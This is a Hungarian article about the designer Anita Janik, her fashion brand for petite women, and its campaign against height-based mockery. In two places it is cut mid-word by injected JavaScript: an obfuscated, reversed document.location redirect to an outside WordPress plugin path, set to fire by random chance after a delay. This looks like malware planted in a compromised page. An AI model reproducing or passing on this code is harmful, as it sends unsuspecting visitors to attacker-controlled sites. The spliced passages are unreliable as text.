Eddig semmilyen képviselete nem volt az alacsony nőknek Magyarországon. Annak ellenére sem, hogy a hétköznapjaik gyakran nehezebbek, mint magasabb társaiké – mondja Janik Anita, petite size designer, a Petite Anita Janik alacsony nőkre tervezett magyar designer márka társalapítója, aki 2016 óta kutatja a divat e területét. Tapasztalata szerint a divatvilág által meghatározott nőideálnak köszönhetően sokakat ér negatív megkülönböztetés a testmagasságuk miatt.
„Sajnos sok alacsony nőt nem vesznek komolyan a munkahelyén, vagy az élet egyéb területein. Nekem is rengetegen mesélték el, hogy már az iskolában kigúnyolták, törpillának nevezték őket. Ezt idővel meg lehet tanulni kezelni, de megszokni nem, hogy olyanért kritizálnak, amiről nem tehetünk. Egy ilyen bélyeg pedig felnőttkorban is nyomot hagyhat sokunk lelkén. Nem beszélve arról, hogy sokan könnyen hiszik azt emiatt, hogy nincs helyén az önbecsülésük, lenézik őket, vagy legalábbis másképp kezelik” – mondja.
Gyakran előfordul, hogy az alacsony nőket még a harmincas éveikben is gyereknek nézik, ezért például a gyerekosztályra irányítják a ruházati üzletekben, vagy nem engedik be személyi nélkül a szórakozóhelyekre.
„Ki lehet fogni alacsony nőként olyan ruhákat, ami ha szerencsénk van jól áll, vagy egy jó varrónő segítségével úgy alakítható át, hogy nem lesz észrevehető a váltoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toztatás. Viszont ez sok macera és az ilyen ruhákból mégsem érhető el olyan és akkora választék számunkra, mint a sztenderd konfekció méretekből a magasabb többségnek. Hiszen nekünk petite size nőknek például a derékbőség, derékvonal, a vállszélesség és a nadrágok hossza, ülepmélysége, térdvonala, stb. is kritikus pont lehet. Mondhatni számunkra a legtöbbször egy nyűg az öltözködés és a ruhavásárlás” – meséli a téma specialistája Janik Anita.
Jóból keveset adnak
A Petite Anita Janik alapítói éppen ezért határoztak úgy, hogy figyelemfelhívó kampányt indítanak az alacsony nőkért: hisz itt az ideje, hogy ők is megkapják ugyanazt a figyelmet, elismerést és megbecsülést, mint magasabb társaik.
Éppen ezért hozták létre szemléletformáló kollekciójukat, ahol különböző karakterű modellekkel mutatják be, hogy minden nő másképp gyönyörű, illetve – ahogy a természetes adottságuk szépségét szimbolizálni hivatoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tott üzenet is szól –, Jóból keveset adnak.
„A Proud Petite kollekció első bemutatkozója egy különleges felirattal van ellátva. Így szeretnénk kicsit felrázni a társadalmat, és rádöbbenteni az embereket, hogy nem jó poén megjegyzéseket tenni a másik magasságára és adottságaira. Mindezt azonban frappáns módon tesszük, hogy eközben mégis mosolyt csaljunk az arcokra” – teszi hozzá a 155 cm magas Janik Anita.